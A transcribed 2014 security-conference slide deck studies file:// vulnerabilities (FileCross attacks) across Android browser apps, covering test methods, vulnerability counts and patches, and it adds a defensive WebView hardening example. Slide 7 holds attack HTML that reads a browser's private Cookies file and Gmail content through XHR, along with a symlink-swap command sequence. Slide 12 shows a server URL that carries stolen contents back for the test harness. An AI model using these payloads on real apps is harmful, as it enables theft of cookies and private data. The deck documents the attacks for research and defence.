Analysis of file:// Vulnerabilities in Android Browser Apps

Slide 1: Analyzing Android Browser Apps for file:// Vulnerabilities
Daoyuan Wu and Rocky Chang, The Hong Kong Polytechnic University
Information Security Conference (ISC), Oct 13, 2014
Slide 2: file://
file:// is a standard URI scheme used in modern browsers, like the well-known http:// and https://. It can be used to browse local files.
Slide 3: Unfortunately, file:// is an enemy of the mobile security model.
Slide 4: Mobile Security Model: Sandbox-based App Isolation
[Figure: App A and App B sit on either side of an app boundary; each app's sensitive files stay inside its own sandbox.]
Slide 5: However, file:// requests may break the app data isolation
[Figure: a file:// request from App A crosses the app boundary into App B's sandbox; file:// vulnerabilities turn the app's sensitive files into stolen files.]
Slide 6: An Empirical Study on file:// Vulnerabilities in Android Browser Apps
- A unified attack model, FileCross
- Automated testing of Android browsers
- Vulnerability results: 64 vulnerable browsers, 177 FileCross issues, across different system versions and web engines
- Further analysis: analyze 10 patches and current file:// practices
Slide 7: The FileCross attacks
[Figure: an Attack App issues external file:// browsing requests to the Exposed Browsing Interface of a Victim Browser. The browser's Private File Zone holds its sensitive files (Cookies). Four requests are shown: file:///data/data/pkg/dir/Cookies (A1), file:///path/attack2.html (A2), file:///path/attack3.html (A3) and file:///path/attack4.html (A4).]

(A1) The browser opens file:///data/data/pkg/dir/Cookies; the Cookies file is auto-downloaded to the SD card, where the attack app executes Cmd 1 (slide pseudocode):
    Thread.sleep(3000);
    filepath = findFileInSDcard("Cookies");
    if (filepath) readFileFromSDcard(filepath);

(A2) attack2.html reads Cookies from the private file zone, compromising the SOP on the "host" level:
    <html><body><h1>attack2</h1>
    <script>
    var aim = '/data/data/pkg/dir/Cookies';
    function sendFile(txt) { }   // body left empty on the slide
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = function() {
      if (xhr.readyState == 4) {
        sendFile(xhr.responseText);
      }
    };
    xhr.open('GET', aim);
    xhr.send(null);
    </script>
    </body></html>

(A3) attack3.html reads http(s):// content, compromising the SOP on the "protocol" level:
    <html><body><h1>attack3</h1>
    <script>
    var aim = 'https://mail.google.com';
    function sendFile(txt) { }   // body left empty on the slide
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = function() {
      if (xhr.readyState == 4) {
        sendFile(xhr.responseText);
      }
    };
    xhr.open('GET', aim);
    xhr.send(null);
    </script>
    </body></html>

(A4) attack4.html re-reads its own document.URL after a delay, while the attack app executes Cmd 4 to replace the file with a symbolic link to Cookies, compromising the SOP via symbolic links.
    Cmd 4 (slide pseudocode):
    Thread.sleep(4000);
    rm /path/attack4.html
    ln -s /.../Cookies /path/attack4.html

    <html><body><h1>attack4</h1>
    <script>
    var aim = document.URL;
    function sendFile(txt) { }   // body left empty on the slide
    setTimeout(function() {
      var xhr = new XMLHttpRequest();
      xhr.onload = function() {
        sendFile(xhr.responseText);
      };
      xhr.open('GET', aim);
      xhr.send(null);
    }, 8000);
    </script>
    </body></html>
Slide 8: Automated Testing of Android Browsers
Test over 100 Android browsers in less than four hours (on multiple devices concurrently).
Slide 9: The Architecture and Workflow of Our Testing System
[Figure: architecture and workflow of the testing system.]
Slide 10: The Major Testing Steps: Identifying Exposed Browsing Interfaces (EBI)
- Propose a lightweight but effective scoring mechanism.
- Score each component based on our summarized EBI patterns.
- Select the component with the maximal score as the EBI.
Can accurately identify the EBIs in 113 browsers out of the tested 116 browsers.*
* The remaining three are: one is an add-on, and the other two do not expose browsing interfaces.
Slide 11: The Major Testing Steps: Warming up browsers and finding target sensitive files
- The goal of warming up browsers is to produce some private files.
- Then our system continues to find target sensitive files from the newly generated private files.
Target keywords: "cookie", "password", "bookmark"
Slide 12: The Major Testing Steps: Automatic attack validation and characterization
- We cannot rely on naked-eye inspection.
- Embed five patterns into the attack requests; the Web Receiver automatically interprets them:
    http://ourserver.com/send?pkg=<app pkg name>&atk=<attack ID>&ver=<device version>&con=<contents>&kid=<a key ID>
Slide 13: Our Findings
1) Vulnerability results
2) Vulnerability distribution
3) Further analysis
Slide 14: Overall Vulnerability Results
- More than half of the browsers tested are vulnerable to the FileCross attacks (64 vulnerable browsers).
- 50% of the most popular browsers are also vulnerable (such as Firefox, Baidu, and Maxthon).
Slide 15: Representative Vulnerable Browsers
[Figure: representative vulnerable browsers.]

Slide 16: Vulnerability Distribution: Across Different System Versions
- The file:// vulnerabilities are exploitable in all Android versions.
- A2 and A3 most affect Android 4.0, but Android 4.3 still has over 30 issues of A2 and A3.
- Android 4.4, which employs a Chrome-based web engine, is still exploitable by A2, A3 and A4.
- A4 has no engine-level patch in 4.4.
Slide 17: Vulnerability Distribution: Across Different Web Engines
- Among 15 browsers that employ custom engines, three are vulnerable:
    Firefox: libmozglue.so
    UC Browser HD: libWebCore_UC.so
    Sogou: libsogouwebcore.so
- This demonstrates that our automated system is valuable for testing browsers that may adopt different engines.
Slide 18: Patch Analysis
We have devoted considerable effort to reporting our identified vulnerabilities.
Slide 19: The Current Practice on Exposed Browsing Interfaces
[Figure: a breakdown of exposed browsing interfaces in the 115 tested browsers.]
Slide 20: The Current Practice on file:// Support in Android Browsers
- 65% of the browsers accept external file:// browsing requests.
- 62% even allow file:// access to the private file zones. We believe this practice should be forbidden in the mobile environment.
- 63% support JavaScript execution in file:// URLs.
Slide 21: Some Good Practice Examples on file:// Support in Android Browsers
- file:// is generally not supported in lightweight and dedicated browsers (which spares them from the FileCross attacks).
- Several popular browsers already forbid file:// access to private file zones (Chrome, Dolphin, UC, Yandex browsers).
- Three browsers have actively disabled JavaScript execution in file:// URLs.
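As an added example (not code from the slides or from any browser they study), the two good practices above written out for an Android WebView-based browser: external file:// requests that resolve into the app's own private data directory are refused, and the WebSettings that deny file:// origins the reads used by A2, A3 and A4 are applied. The class name FileUrlPolicy, the about:blank fallback and the use of getCanonicalPath() are assumptions, not anything the slides describe.

```java
import android.content.Context;
import android.content.Intent;
import android.net.Uri;
import android.webkit.WebSettings;
import android.webkit.WebView;
import java.io.File;
import java.io.IOException;

// Hypothetical hardening helper for a browser's exposed browsing interface (EBI);
// not taken from the slides or from any browser studied in them.
public final class FileUrlPolicy {
    // Accept http(s):// freely; accept file:// only when the target does not resolve
    // into this app's private data directory (the Cookies location targeted on slide 7).
    public static boolean isAllowedExternalUri(Context ctx, Uri uri) {
        if (uri == null || uri.getScheme() == null) return false;
        String scheme = uri.getScheme().toLowerCase();
        if (!"file".equals(scheme)) {
            return "http".equals(scheme) || "https".equals(scheme);
        }
        String path = uri.getPath();
        if (path == null) return false;
        try {
            // getCanonicalPath() follows symlinks, so a link on the SD card that already
            // points at /data/data/<pkg>/... is compared by its real target, not its name.
            String real = new File(path).getCanonicalPath();
            String privateDir = new File(ctx.getApplicationInfo().dataDir).getCanonicalPath();
            return !(real.equals(privateDir) || real.startsWith(privateDir + File.separator));
        } catch (IOException e) {
            return false; // unresolvable path: fail closed
        }
    }
    // Engine-level settings: a file:// origin loses the right to read other files or foreign origins.
    public static void hardenWebView(WebView wv) {
        WebSettings s = wv.getSettings();
        s.setAllowFileAccess(false);                  // for browsers that need no local files at all (slide 21); omit if file:// browsing is a feature
        s.setAllowFileAccessFromFileURLs(false);      // a file:// page may not XHR other file:// URLs (the A2 and A4 read)
        s.setAllowUniversalAccessFromFileURLs(false); // a file:// page may not XHR http(s):// content (the A3 read)
    }
    // Called from the EBI activity's onCreate()/onNewIntent() with the incoming Intent.
    public static void loadFromIntent(Context ctx, WebView wv, Intent intent) {
        hardenWebView(wv);
        Uri data = intent.getData();
        if (isAllowedExternalUri(ctx, data)) {
            wv.loadUrl(data.toString());
        } else {
            wv.loadUrl("about:blank"); // refuse the request instead of rendering it
        }
    }
}
```

The path check runs before the page loads, so it cannot see the symbolic link that Cmd 4 creates afterwards; denying file-to-file reads in WebSettings is what closes that later read.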
Slide 22: Q & A
My homepage: https://daoyuan14.github.io/
Slide 23: Exposed Browsing Interfaces (EBI) Patterns
[Figure: the summarized EBI patterns used by the scoring mechanism.]
Slide 24: Four Types of FileCross Attacks
We are the first to identify them as a unified attack model (i.e., FileCross) and to conduct automated testing to analyze their prevalence in Android browsers.